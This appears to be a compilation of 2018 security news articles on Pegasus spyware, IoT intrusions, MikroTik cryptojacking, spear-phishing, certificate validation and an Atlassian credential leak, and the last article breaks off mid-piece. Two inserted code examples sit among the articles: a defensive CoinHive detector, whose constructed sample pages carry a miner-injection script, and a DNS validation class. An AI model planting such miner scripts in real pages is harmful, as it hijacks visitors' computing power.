STE WILLIAMS

Amnesty International spearphished with government spyware

Amnesty International has been spearphished by a WhatsApp message bearing links to what the organization believes to be malicious, powerful spyware: specifically, Pegasus, which has been called History’s Most Sophisticated Tracker Program.

On Wednesday, the human rights-focused NGO said in a post that a staffer received the link to the malware in June. It was baited with a message written in Arabic that implored the group to cover a protest for “your brothers detained in Saudi Arabia in front of the Saudi embassy in Washington.”

My brother is detained in Ramadan and I am on a scholarship here so please do not link me to this [link]

Cover the protest now it will start in less than an hour

We need your support please

Pegasus is a tool sold by NSO Group, an Israeli company that sells off-the-shelf spyware. It enables governments to send a personalized text message with an infected link to a blank page. Click on it, whether it be on an iOS or Android phone, and the software gains full control over the targeted device, monitoring all messaging, contacts and calendars, and possibly even turning on microphones and cameras for surveillance purposes.

Pegasus at one point even worked on non-jailbroken iOS devices. In 2016, Citizen Lab and Lookout discovered that the spyware was exploiting three critical iOS zero-day vulnerabilities to slip past Apple’s device security and install itself. Apple quickly fixed the vulnerabilities when alerted to them, according to Lookout.

This isn’t the first time that a group or individual who isn’t supposed to be a target of Pegasus has alleged they have been. NSO Group’s response to incidents like this has been consistent on each occasion: the company points to the fact that Pegasus is supposed to be used solely by governments, to enable them to invisibly track criminals and terrorists.

The statement NSO Group issued on Wednesday following Amnesty International having contacted it with its findings:

NSO Group develops cyber technology to allow government agencies to identify and disrupt terrorist and criminal plots. Our product is intended to be used exclusively for the investigation and prevention of crime and terrorism. Any use of our technology that is counter to that purpose is a violation of our policies, legal contracts, and the values that we stand for as a company. If an allegation arises concerning a violation of our contract or inappropriate use of our technology, as Amnesty has offered, we investigate the issue and take appropriate action based on those findings. We welcome any specific information that can assist us in further investigation of the matter.

Once software blinks into existence, keeping it out of the hands of the wrong people can be very difficult. Pegasus is a case in point: last month, one of NSO Group’s own employees allegedly stole the valuable software and hid it under his bed. Then, he allegedly tried to sell it for the bargain basement price of USD $50 million. (According to the indictment (PDF), the tool is estimated to be worth “hundreds of millions of [US] dollars.”)

Last year, Pegasus was also reportedly used to target Mexico’s “most prominent human rights lawyers, journalists and anti-corruption activists, in spite of an explicit agreement that it be used only to battle terrorists or the drug cartels and criminal groups that have long kidnapped and killed Mexicans,” as the New York Times reported.

According to Amnesty International, Pegasus has also been used in the United Arab Emirates, where the government targeted prominent human rights activist and political dissident Ahmed Mansoor. In June, Mansoor was sentenced to 10 years in jail and a fine of 1,000,000 Emirati Dirham (USD $272K) on charges including “insulting the UAE and its symbols.”

The Amnesty International staffer didn’t need to click on the malicious link to ascertain that it was a spearphishing attack. The group says it figured it out because the message looks to have come from a commercial provider that offers, among other services, a virtual phone number management system that allows customers to automatically send bulk SMS messages.

Such a feature is normally used for promotional campaigns or other forms of automated systems, but Amnesty believes that the attackers might be using the service to automate the process of sending malicious SMS and WhatsApp messages containing malware.

Amnesty said the link in the message was clearly rigged: it pointed to a domain that it claims belongs to a large network infrastructure connected to NSO Group.

Amnesty says it knows all this about Pegasus thanks to Mansoor, the now-jailed UAE human rights defender, who was himself targeted with Pegasus. Mansoor shared the phishing message that contained Pegasus with Citizen Lab: a Canadian research group from the University of Toronto that went on to publish numerous reports on the spyware in 2016 and 2017.

In its analysis of the messages, Amnesty claims to have found connections with a network of over 600 suspicious domain names. Not only are these domain names suspicious, Amnesty said; they also overlap with infrastructure previously identified as part of Pegasus.

Amnesty said that those 600 domains “represent potential threats to human rights defenders and civil society actors in countless other countries around the world.”

“Defending human rights is not a crime,” Amnesty said, yet tools meant to catch terrorists are being used against those who fight to defend human rights. What’s more, the attackers are baiting their snares with Amnesty’s interest in fighting for those human rights:

The unchecked use of surveillance technologies such as those produced by NSO Group can have a serious silencing effect on civil society. Someone doesn’t even need to actually be spied on to feel the repressive reach of the surveillance industry – especially when our interest in human rights is knowingly and purposefully used as bait.

When in doubt, don’t click, whether it’s a link in an email, WhatsApp, or other text messages. Be like that targeted Amnesty International staffer: put unexpected messages, and whatever links they try to lure you into clicking, under a microscope.

Take note that the attackers in this case have also used Bit.ly shortened URLs. That’s a method used by malware distributors and phishers to conceal the true destinations of their links. You can’t tell whether a shortened link is evil or not just by looking at it, but in the case of Bit.ly you can add a “+” after the Bitlink in your browser’s address bar to get a preview of where it wants to take you.

Remember though, criminals often add phishing pages to legitimate websites they’ve hacked, so while an unusual or untrustworthy domain is probably a bad sign, a trustworthy domain isn’t necessarily a good one!


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/y4uNizGZ8S0/

Porn parking, livid lockers and botched blenders: The nightmare IoT world come true

Some time in the near future, you may go to a parking kiosk and rather than be presented with a $5 fee request, get confronted with low-res porn images.

Likewise that locker at the gym may be used to send your bank account details to cybercriminals. And even your blender could be spying on you.

That is the nightmare internet-of-things world that security researchers at Darktrace claim to have already uncovered, according to a whitepaper published this week.

In a 12-page summary seen by El Reg, the biz lists a series of attacks on small-scale devices that it claims to have identified and stamped out. Hackers apparently then tried to use these attacks to leapfrog into corporate networks where valuable data may exist.

The most amusing incident is a parking kiosk that Darktrace says was hacked and then connected to an adult content website. The company says that none of the images actually appeared on the screen and seems confused as to what the reason for the hack was in the first place (we’re willing to bet the answer is not more complicated than: because we can).

But dumb devices do represent potentially serious threats. The report details another incident where hackers connected to a range of internet-connected devices on a food assembly line – including blenders and slicers – in an effort to connect to the broader corporate network.

They were also apparently unsuccessful in that effort – Darktrace says thanks to its artificial intelligence software identifying the threat – but the story does detail the dangers that exist in a digital world where everything connects to the internet. It only takes a line manager to buy and plug in a new piece of kit and then type in the office’s wireless password for a security hole to be opened up.

Internet of shit

As we have outlined in long and tedious detail in the past, companies that put out IoT devices or shove internet connections into updated product lines rarely consider security requirements and even more rarely update the firmware and software to keep up to date with security reports.

Such products are rarely updated, leaving potential security holes in place for years. And even if a manufacturer does allow software updates over the air, unless they lock that process down too, they risk making it easy for hackers to get into a system.

The report has another fun example: personal storage lockers at an “amusement park in North America.” In this case, the smart lockers work with a third-party online platform that employees used to enter access codes. But hackers got into the system and used the locker codes to enter the third-party’s system and steal data.

The report notes a gigabyte of data was sent out of the network that “could have included identifying details or sensitive credentials” and “had the potential to be transmitted over the internet entirely unprotected – giving the attackers ability to intercept the connections and use the information to breach the company’s network defenses.”

C-suite meet

There are a range of other examples given in the report, all of which come with happy endings thanks to Darktrace’s wonderful products and which are notable by the fact that the details are basically catnip for journalists like us who love a porn-on-the-kiosk tale. But there is a good underlying point: companies need to think a lot more strategically about their networks.

With the prevalence of devices that connect to the internet and the fact that, out of necessity, large numbers of employees have access to wireless passwords, it is crucial that sysadmins keep an eye on what is going on with their networks in case hackers find an effective backdoor.

There is no shortage of possible solutions of course. This report basically says it’s time to push that meeting with senior management to look at buying some additional monitoring software. And what better than an amusing and worrying tale to bring it home to the suits? ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/iot_nightmare_darktrace/

Dear alt-right morons and other miscreants: Disrupt DEF CON, and the goons will ‘ave you

DEF CON The organizers of the DEF CON hacking conference, due to be held in Las Vegas, USA, next week, have put those who intend to spoil the event on warning: such tactics will not be tolerated.

At last month’s Hackers on Planet Earth (HOPE) event in New York City, several sessions were wrecked by white nationalist attendees spouting conspiracy theory crap, one of whom tried to rush the stage. One man, wearing a “Make America Great Again” hat, derailed a question-and-answer session, had his cap stolen, and called the police. Both the thief, and later the troll, were expelled from the confab.

The trouble was, the MAGA miscreants had mostly gamed and exploited the HOPE Code of Conduct, staying just inside the anti-harassment rules yet infuriating and intimidating audiences – think loud-mouth Westboro Baptist Church scumbags turning up outside your place of work. They even spun the code of conduct around on those complaining about them, declaring that they were being fat-shamed and thus they were the ones being harassed. Professional trolls, in other words.

Mozilla staffer Jairus Khan described the kerfuffles, here. Essentially, the menacers should have been dealt with immediately rather than allowed to block aisles, troll sessions, and provoke violence. The ruckus was enough for a range of groups, including the Tor Project and the Courage Foundation, to furiously slam the HOPE organizers for failing to boot out fascists and white supremacists.

The HOPE meltdown, and similar problems at the Chaos Computer Club conference last December, suggest that there is an organized attempt to disrupt hacking events by members of the alt-right. But when it comes to DEF CON, founder Jeff Moss made it clear he wasn’t having any such nonsense at his party.


“When I designed the updated DEF CON Code of Conduct in 2015, I had a few goals in mind,” he blogged late last month. “Make it simple to understand, express in broad strokes what kind of behavior is not acceptable, and don’t be too specific.

“I wanted it to act as a template for other conferences, if they chose to do so. It was legally reviewed by our outside law firm and a specialist. In 2018, it’s looking like it may get seriously crash tested.”

The upshot: the DEF CON Code of Conduct is a broad guideline rather than a rigid set of laws. Other conferences have tried to apply such rules evenly to all sides, even when one side is being deliberately disruptive, and have run into problems.

Simply put: if you’re an asshole, you’ll get thrown out. Moss said he will “err on the side of removing people, rather than allow them to spoil the conference for those who just want to contribute in a positive way.”

Security at DEF CON is handled by a group of red-t-shirt-wearing volunteers known as the goons. They make sure no one gets out of line, break up potential trouble with tact and diplomacy, and aren’t above physically ejecting troublemakers.

One of the unwritten rules of DEF CON is that you never, ever, cross the goons. If anyone tries anything next week they are likely to be kicked into the fetid hell of the August Las Vegas sunshine with a boot mark on their backsides. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/def_con_alt_right/

MikroTik routers grab their pickaxes, descend into the crypto mines

Researchers have found thousands of MikroTik network routers in Brazil serving up crypto-coin-crafting CoinHive code.

Trustwave researcher Simon Kenin said this week one or more attackers have exploited a known vulnerability in MikroTik’s enterprise routers to inject error pages with code that uses visitors’ machines to mine digital dosh for the miscreants.

Kenin says that the attackers have been running an exploit script to gain administrator access over the targeted routers, then installing a custom page that would come up any time an error occurs. Within that page is the actual code that employs any spare compute power on the browsing computer to mine cryptocoins and then transmit them to an address controlled by the attacker.

The exploit itself is not exactly novel, and it’s hard to blame the vendor in this case. The targeted vulnerability was patched by MikroTik back in April, just days after it was initially reported. Unfortunately, admins have been slow to patch the bug on their own appliances.

“To MikroTik’s credit, they patched the vulnerability within a day of its discovery, but unfortunately there are hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Kenin noted.

Thus far, Kenin said, the attacks are geographically limited to systems in Brazil, though they do appear to be spreading to other places. Additionally, Kenin found, web servers sitting behind an infected router end up having the code injected into the pages they serve to outside visitors.


“What this means is that this also impacts users who are not directly connected to the infected router’s network, but also users who visit websites behind these infected routers,” Kenin said.

“In other words, the attack works in both directions.”

This is a problem because MikroTik’s routers are used by a number of large companies, including ISPs.

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” said Kenin.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily.”

Kenin is advising anyone using a MikroTik device to update their firmware as soon as possible to make sure their systems will be protected against the exploit used to install the mining code. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/03/mikrotik_routers_cryptocurrency/

Cryptojacker Campaign Hits MikroTik Routers

More than 200,000 routers hit with a sophisticated cryptomining attack that appears to be spreading.

In March, routers from Latvian manufacturer MikroTik were hit by an advanced threat dubbed Operation Slingshot. The company patched for the threat, but now a new cryptomining attack has hit MikroTik routers and appears to be spreading rapidly.

The original Operation Slingshot campaign was spyware that was able to gather screenshots, keyboard data, network data, passwords, various desktop activity, the clipboard, and more without ever using a zero-day exploit. Instead, the attack took advantage of two modules that were able to implant themselves in a targeted router. Those modules were accompanied by very sophisticated detection evasion techniques that included shutting down the attack if certain forensic activities were detected. Nevertheless, the attack was discovered and countered.

This time around, researchers have found a new MikroTik-targeting cryptojacking campaign that began with routers in Brazil and is now spreading beyond those borders. The campaign, which injects cryptomining software into traffic transiting an infected MikroTik router, was so successful that the performance hit was what drew attention to the attack; the threat actor then shifted strategies to only inject the miner through router-based error pages.

According to researchers at Trustwave, the attack has now hit more than 200,000 routers, with the number still growing as of this writing. Further, tens of thousands of those routers are outside Brazil, indicating that any initial geographic targeting is no longer in effect.

“Everyone with a MikroTik router should be worried that they will be targeted no matter where they reside,” says Karl Sigler, threat intelligence manager at Trustwave. Fortunately, those same global users have a meaningful response possible for the attack.

“Hopefully with enough coverage, users of MikroTik routers will patch their devices,” Sigler adds. “A single patch [available since April] is enough to stop this exploitation in its tracks.”

This is not the first time MikroTik owners have been urged to patch and reboot their routers. MikroTik equipment was specifically mentioned in the FBI’s May 2018 call for router reboots, and even the March attack was effective only against routers that were not up to date with software patches.
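Both the Trustwave write-up above and the earlier Register piece describe the same symptom: HTML passing through a compromised router, at first any page and later only the router’s own error pages, arrives with a CoinHive miner script spliced in. The following is an added example, not code from Trustwave, MikroTik or CoinHive: a small detector that a defender could run over captured HTTP responses to flag that symptom. The indicators (the public coinhive.com library URL and the CoinHive.Anonymous bootstrap object) are the real, well-known markers of that miner; the HTTP responses and site key below are constructed for the demonstration.

```python
"""Flag CoinHive miner code spliced into HTTP responses (added example)."""
import re
from typing import Dict, List, NamedTuple, Tuple

# Public markers of the browser-based CoinHive miner. Real indicators; the
# site key used in the constructed sample below is NOT a real key.
MINER_HOSTS = ("coinhive.com",)
MINER_MARKERS = ("CoinHive.Anonymous", "coinhive.min.js")

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)


class Finding(NamedTuple):
    status: int      # HTTP status of the response carrying the script
    reason: str      # why the script tag was flagged
    evidence: str    # the src URL or the start of the inline code


def split_response(raw: bytes) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", "replace")


def inspect_response(raw: bytes) -> List[Finding]:
    """Return one Finding per suspicious <script> tag in an HTML response."""
    status, headers, body = split_response(raw)
    findings: List[Finding] = []
    if "text/html" not in headers.get("content-type", ""):
        return findings
    for attrs, inline in SCRIPT_RE.findall(body):
        src = SRC_RE.search(attrs)
        if src and any(h in src.group(1).lower() for h in MINER_HOSTS):
            findings.append(Finding(status, "script loaded from miner host", src.group(1)))
        if any(marker in inline for marker in MINER_MARKERS):
            findings.append(Finding(status, "inline miner bootstrap", inline.strip()[:60]))
        if status >= 400:
            # A router's own error page has no business shipping JavaScript
            # at all, which is what made the later phase of the campaign
            # stand out once the blanket injection was noticed.
            findings.append(Finding(status, "script on error page", src.group(1) if src else inline.strip()[:60]))
    return findings


# Constructed samples: a clean page, an error page with the miner spliced
# in, and an ordinary page served from behind the router with the same
# injection (the "both directions" case Kenin describes).
CLEAN_200 = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
             b"<html><body><script src='/app.js'></script></body></html>")
INJECTED_404 = (b"HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n"
                b"<html><body><h1>Not Found</h1>"
                b"<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
                b"<script>var m=new CoinHive.Anonymous('CONSTRUCTED-SITE-KEY');m.start();</script>"
                b"</body></html>")
INJECTED_200 = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                b"<html><body><p>Shop</p>"
                b"<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
                b"</body></html>")

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_200), ("error page", INJECTED_404), ("normal page", INJECTED_200)):
        print(label, inspect_response(sample))
```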


Article source: https://www.darkreading.com/attacks-breaches/cryptojacker-campaign-hits-mikrotik-routers/d/d-id/1332478?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Industrial Sector Targeted in Highly Personalized Spear-Phishing Campaign

At least 400 companies in Russia have been in the bullseye of new, sophisticated spear-phishing attacks, Kaspersky Lab says.

A sophisticated new phishing campaign targeting organizations in the industrial sector shows yet again how attackers are constantly improving at luring high-value users into executing malware on their systems.

In a technical advisory Wednesday, security vendor Kaspersky Lab said it has observed a wave of spear-phishing emails expertly disguised as procurement and accounting letters being sent to carefully selected individuals at companies mostly in Russia. The attackers have typically been targeting finance and project-management related employees at these companies, and the main goal appears to be to steal money from victim organizations.

So far, the threat actors behind the campaign have targeted at least 800 computers across 400 organizations in industries such as energy, manufacturing, oil and gas, logistics, and construction.

The emails are usually addressed to the targeted individuals by their full name and contain content — such as invitations to tender bids — that corresponds with their company’s business and the individual’s job roles.

The malicious attachments in many of the emails have names that suggest a connection with finance. In some cases, the attackers have been sending emails with no attachments but with links embedded in the content to external sites from where malware can be downloaded to their system. The domain names from which the emails are sent are usually very similar to the domain name of the organization that purportedly sent them.

The attackers have been using various tactics to mask infections, Kaspersky Lab said in its report. If a user is tricked into opening a malicious attachment purporting to be about procurement tenders, for instance, a modified version of a legitimate software tool to search for tenders is installed on the victim system along with the malware.

The malware is used to install either TeamViewer or some other legitimate utility for remotely controlling infected systems. The attackers have then been using their remote access to inspect compromised systems for documents pertaining to financial, accounting, and procurement operations with a view to using them to enable financial fraud.

One tactic has been to change details in payment bills so payments are sent to the attackers rather than the intended organization, Kaspersky noted. When the attackers want additional information or access to other systems, they install additional malware to enable that goal.

Kaspersky Lab’s analysis of the phishing campaign suggests that the attackers started the campaign last October and targeted a relatively short list of companies through March this year, says Kirill Kruglov, senior research developer at Kaspersky Lab.

Since then, the attackers have broadened their attacks and are now going after a much broader set of targets.

“There could be at least two explanations,” for why the attackers began small and then expanded their target list, Kruglov says. “[Either] the attackers collected data during the attack month by month, or they tested the attack vector on some portion of the information they had before launching it in full scope.”

Financial Goals

So far, the attackers appear focused only on stealing money. The attackers use spyware to collect data and credentials for propagating inside victim networks. But there has been no evidence of purposeful interest in espionage and data theft.

While the task of assembling the information needed to carry out a targeted and highly personalized phishing campaign of this sort might appear enormous, in reality it isn’t, Kruglov notes.

Usually, threat actors collect public information from corporate websites, social networks, and other sources. Or they could simply buy it on hacker forums or the dark net. “This means it is not much work. A few months are more than enough for threat actors to prepare such an attack,” he says.

Kaspersky Lab’s report is the second reminder this week of the growing sophistication of spear-phishing campaigns and the enormous success they are netting threat actors. On Wednesday, US law enforcement authorities announced the arrests of three Ukrainian nationals connected with FIN7, a group believed responsible for stealing data on more than 15 million payment cards from organizations such as Saks Fifth Avenue, Chipotle and Arby’s.

In many of the attacks, FIN7 operatives sent carefully crafted spear-phishing emails to vetted individuals at the targeted organization with the goal of installing malware on their systems for enabling payment card theft. FIN7 members even went to the extent of making phone calls to targeted individuals either before or after sending them a phishing email to try and bolster the credibility of their phishing lure.

“The level of meticulous detail in targeting more than eight hundred employees’ PCs in today’s widespread Eastern European spear-phishing campaign confirms what we’ve been seeing for some time,” said Rohyt Belani, CEO and co-founder of Cofense. “Global phishing actors continue to leverage more personalized, spear-phishing campaigns as a sure-fire way to bypass next-generation email gateways and perimeter controls.”


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/attacks-breaches/industrial-sector-targeted-in-highly-personalized-spear-phishing-campaign-/d/d-id/1332477?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Castaway hacker guilty of sedating children’s hospital computers

A self-styled Anonymous hacker who attempted to flee the US in a sailboat has been convicted of two felonies for his role in a 2014 distributed denial-of-service (DDoS) attack on a children’s hospital.

A jury in the Massachusetts US district court found Martin Gottesfeld guilty this week on charges of conspiracy to intentionally damage a protected computer and committing intentional damage to protected computers.

A sentencing hearing has been set for November 11. Gottesfeld, 32, faces up to ten years in the clink for the damaging protected computers charge and five years for the conspiracy charge.

The charges stem from Gottesfeld’s part in the March 2014 crippling of the internal network of the Boston Children’s Hospital as part of “OpJustina” – a hacktivist campaign on behalf of the parents of a teen who had been taken into state custody because she was believed to be the victim of abuse. It was later found that the girl’s bruises were the result of a medical condition and not physical abuse.

The hospital claimed it had to fork out more than $300,000 in damages and costs in recovering from the DDoS attack that knocked out its computer network.


Investigators found [PDF] that Gottesfeld played a key role in the assault, both in planning and executing the strike and in creating YouTube videos and Twitter accounts that called for others to join in the DDoS effort.

Once the FBI caught wind of the operation and began to investigate Gottesfeld in early 2016, the then-31-year-old attempted to flee the US with his wife in a sailboat bound for Cuba.

Perhaps unsurprisingly, the would-be fugitive was unable to successfully navigate the waters of the Caribbean and, after being blown off course, he and his spouse had to be plucked from the water by a Disney cruise ship that handed the pair to authorities in Miami, Florida. There’s no word on whether they got to meet Mickey Mouse before being arrested.

Gottesfeld’s wife was not charged in the case. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/castaway_hacker_guilty/

Did you know: Lawyers can certify web domain ownership? Well, not no more they ain’t

Lawyers will no longer be allowed to certify someone’s ownership of an internet domain name, and the public Whois no longer represents proof of ownership, when it comes to assigning security certificates to site owners.

That means, for example, you can no longer pay a lawyer $500 to write you a letter asserting you own a particular domain name, and use that to obtain an SSL/TLS cert for it, nor use the Whois database to back up your claims of ownership. These two security loopholes were shut down this week in revised rules for Certificate Authorities (CAs) – the folks that issue, typically via intermediaries, HTTPS certificates for websites.

Internet users are reliant on these digital certificates to encrypt and protect their connections when they visit a HTTPS website, and the site’s cert must match its domain name. So if you want a certificate for supercyberbadgers.com, you usually have to demonstrate you own or administrate it before the cert is issued.

Thanks to Google’s decision to flag up any site without such a certificate as insecure in its Chrome browser, these certs have become essential. Google’s search engine also favors secure sites, and, of course, there are many other benefits to encrypting your site’s traffic – and these days free certs are available.


The whole system is under scrutiny. Code-signing certs were found on black markets. Millions of old paid-for Symantec-issued web certificates were killed off after it was discovered the biz had failed to follow CA “baseline requirements” and allowed several organizations to issue their own certificates through its systems without appropriate oversight.

It is those “baseline requirements” that are being revised to remove the Whois and lawyer letters as legitimate forms of authentication for identifying who owns and operates a particular domain name.

In March last year, the joint CA/Browser Forum – which decides on the rules – voted to scrap a vaguely worded part of the rules where a CA could use “any other method of confirmation which has at least the same level of assurance as those methods previously described” and replace it with a list of approved methods.

Whowas

That vote was unanimous. However, a more contentious vote in February this year also scrapped the lawyer and Whois methods of authentication. Previously a lawyer was able to write a letter asserting someone’s ownership of a particular domain name, and it could be accepted as proof of ownership. However, the CAs decided this was not a very secure system since lawyers are “generally not qualified to evaluate” domain ownership, according to the man who proposed the motion, Tim Hollebeek of DigiCert.

The Whois method allowed a CA to compare the name and address of the domain owner in the public Whois database to the certificate applicant and approve the application if they matched.

But in another sign that the fiercely protected Whois service isn’t worth the paper it isn’t written on, the CAs decided this also represented a security risk because people simply make up false Whois details and internet overseer ICANN fails to require a decent level of authentication.

Not everyone was on board with the change however: of the 22 CAs, 14 voted yes – basically all the ones you have heard of – four abstained (Actalis, Disig, HARICA, OATI) and four voted against the change (Buypass, Chunghwa Telecom, Entrust Datacard, SwissSign). All five browser makers voted yes (five? Yes, Comodo apparently has a browser called “Dragon” based on Chromium. Who knew?)

But with 78 per cent of CAs voting yes, it passed, and as of August 1 – yesterday – the new rules came into force. It’s not clear that everyone will follow the rules straight away, but if a CA is discovered to be using the now-obsolete validation methods, it risks having the certificate revoked – and security researchers will no doubt be looking out for just this sort of behavior.

Walk through

The process has been covered in some detail by Hollebeek in a blog post. It’s worth noting that his company, DigiCert, is also the company in charge of cleaning up Symantec’s certificate mess – something that he says has been completed.

We spoke to Hollebeek, who views the changes as a critical step in staying ahead of cybercriminals. “There is always a certain amount of angst when there is a ballot to change the baseline requirements,” he told us, “but the threat landscape is constantly changing and we have to get better and better.”

With that in mind, Hollebeek says he will continue pushing to tighten up the validation rules further to limit the opportunity for dodgy certs. CAs have a set of best practices that a future ballot will propose pulling into the official requirements – such as requiring a CA to ask for an applicant by name. There is also a proposal that would require CAs to say in their certificate which method was used to validate a domain – something that could prove useful in identifying future security gaps.

Hollebeek stresses, however, that no one method of validation is perfect, and that some which are perfectly good in one context may be risky in another – for example an agreed website change that could be carried out by a third party on an e-commerce website, or a user account in an online publishing system.

Other approaches that provide a decent level of security: email from the same domain name; agreed changes to a domain’s DNS records; a test certificate; a phone call; and an associated IP address.
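To make the “agreed changes to a domain’s DNS records” method concrete, here is an added example (not DigiCert’s or the CA/Browser Forum’s code) of how a validator can prove domain control: issue an unpredictable token, require it to appear in a TXT record under the domain, and refuse stale or replayed tokens. The record name `_ca-validation` and the 24-hour validity window are assumptions, and the DNS resolver is injected so the example runs offline.

```python
import hmac
import secrets
import time
from typing import Callable, Dict, List, Tuple

# A resolver maps a DNS name to its TXT record values. Injected so this runs
# offline; a real validator would query the domain's authoritative servers.
Resolver = Callable[[str], List[str]]


class DnsChallenge:
    TTL_SECONDS = 24 * 3600          # assumed validity window for a token
    RECORD_PREFIX = "_ca-validation"  # hypothetical record name, not a standard

    def __init__(self, resolver: Resolver, now: Callable[[], float] = time.time):
        self._resolver = resolver
        self._now = now
        self._pending: Dict[str, Tuple[str, float]] = {}

    def issue(self, domain: str) -> str:
        """Create a fresh random token bound to the requested domain."""
        token = secrets.token_urlsafe(32)
        self._pending[domain.lower()] = (token, self._now() + self.TTL_SECONDS)
        return token

    def verify(self, domain: str) -> bool:
        """True only if the issued, unexpired token is published in the domain's TXT records."""
        key = domain.lower()
        entry = self._pending.get(key)
        if entry is None:
            return False  # nothing was issued for this domain
        token, expires = entry
        if self._now() > expires:
            del self._pending[key]
            return False  # stale challenge: applicant must start over
        records = self._resolver(f"{self.RECORD_PREFIX}.{key}")
        # Constant-time comparison so a guessing attempt learns nothing from timing.
        found = any(hmac.compare_digest(r.strip().encode(), token.encode())
                    for r in records)
        if found:
            del self._pending[key]  # one-shot: a published token cannot be reused
        return found
```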

In short, while digital certificates are not foolproof, it will be increasingly difficult for scammers and malware folk to get hold of a legit certificate. Combined with browsers’ warning against websites without such a certificate, the overall security of the internet should be bumped up a little – which can only be a good thing. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/lawyers_domain_ownership/

DEF CON plans to show US election hacking is so easy kids can do it

Last year, the hackers at DEF CON showed how shockingly easy it was to crack into voting machine software and hardware. Next week, the 2018 conference’s Vote Hacking Village will let kids have a shot at subverting democracy.

Beginning on Friday, August 10, teams in three age ranges, 8-11, 12-14 and 15-16, will be let loose on replica American government websites that report election results. In elections in the Ukraine and Ghana, these were hacked to spread confusion about the voting process and its results – and the village’s organizers hope the youngsters can do the same with US-style tech.

“It’s just so easy to hack these websites we thought the grown-up hackers in the vote hacking village wouldn’t find it interesting,” Jake Braun, cofounder of the Vote Hacking Village and executive director of the University of Chicago Cyber Policy Initiative, told The Register. “When I was discussing it with a colleague, they noted ‘it would be child’s play’ and I said ‘good f**king point!’ and started planning the event with the Capture the Packet crew and the r00tz Asylum group, which trains young hackers.”

The websites were built by Brian Markus, one of the best ethical hackers in the US who, when not running DEF CON’s Capture The Packet competition, runs a security consultancy, has served on the President’s National Security Telecommunications Advisory Committee and develops hacking training materials for the US and Australian military.

“We’re pretty confident that anything he’s going to make is going to be a good replica of the government election results websites,” Braun said of Markus’ work. “He’s certainly at least as good at locking down websites as anything whoever is running the state’s election security can put out.”

In two three-hour contests held on Friday and Saturday, the kids will compete to best derail and meddle with the reporting of election results in 13 key US battleground states, which would, in real life, spread confusion and doubt. Prizes will be awarded to the first to exploit a security hole, whoever comes up with the most innovative and best social-engineering exploits, and the youngest to exploit a vulnerability.

“We think kids will come up with creative ways to socially engineer chaos on the results,” Braun said. “We’re hoping to get some ideas from these fresh eyes that are different from the stuff that we’ve been looking at the last two years.”

This isn’t all about fun and games

With US national midterm elections coming in three months, the need for better election security has never been more pressing. On Wednesday, the Republican caucus in Congress shot down an amendment to an appropriations bill proposed by Senator Patrick Leahy (D-VT) that would have allocated $250m to US states to be used for hardening election systems against attack. One Republican senator voted for the amendment and three abstained.


“The integrity of our elections, which are the foundation of our democracy, should not be a partisan issue,” Leahy said after the vote. “It is unfortunate that the Senate has followed the same path as House Republicans in blocking the funding our states need to help upgrade their infrastructure and secure our elections. I fully intend to continue pursuing this issue in conference.”

This has become something of a theme for the Republican caucus. In March, Congress allocated $380m for election security spending, after over a decade that saw little investment and shocking lapses of computer security in the national democratic infrastructure. But then in July, the Republicans killed calls for extra funding.

“The $380m that was given out is an order of magnitude lower than it needs to be – it needs another comma in there if they want to make a dent in this stuff,” Braun opined. “Only a handful of state and local governments have received their cyber assessments from DHS and we still have thousands of jurisdictions that don’t yet have the sensors needed to identify if an attack is taking place. At this point we wouldn’t even know if we were being hacked.”

DEF CON, the world’s biggest and longest-running hacking conference, will take place in Las Vegas from August 9 to 12, and is expected to pull in tens of thousands of hackers and infosec researchers from around the planet. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/defcon_election_hacking/

Putting the ass in Atlassian: Helpdesk email server passwords blabbed to strangers

Exclusive: Atlassian has warned users of its Jira Service Desk toolkit to change their helpdesk email account passwords – after a glitch caused the credentials to be sent to strangers’ servers.

Customers were today sent an advisory, seen by The Register, from Atlassian explaining that, due to a long-standing bug in its IT helpdesk software, those who opted to process their support queries via email had their email server usernames and passwords sent to other Atlassian customers’ email servers. That would allow these strangers to obtain their credentials, if they were logging login attempts.

Here’s how it worked in a nutshell: the email channel option lets organizations running Jira Service Desk receive support requests from their customers via email – such as via [email protected] – and these requests then show up on the Jira service desk web-based dashboard.

In order to do this, Jira needs to log into the organization’s email server to access the helpdesk inbox – eg: it would connect to theregister.com’s mail server and log into the helpdesk@ account. And in order to do this, Jira has to present to the email server the username and password for the account. Thanks to the bug, some of those login requests were sent to the wrong servers, pinging other Atlassian subscribers’ servers and attempting to log in. Thus, the credentials were leaked to third parties.

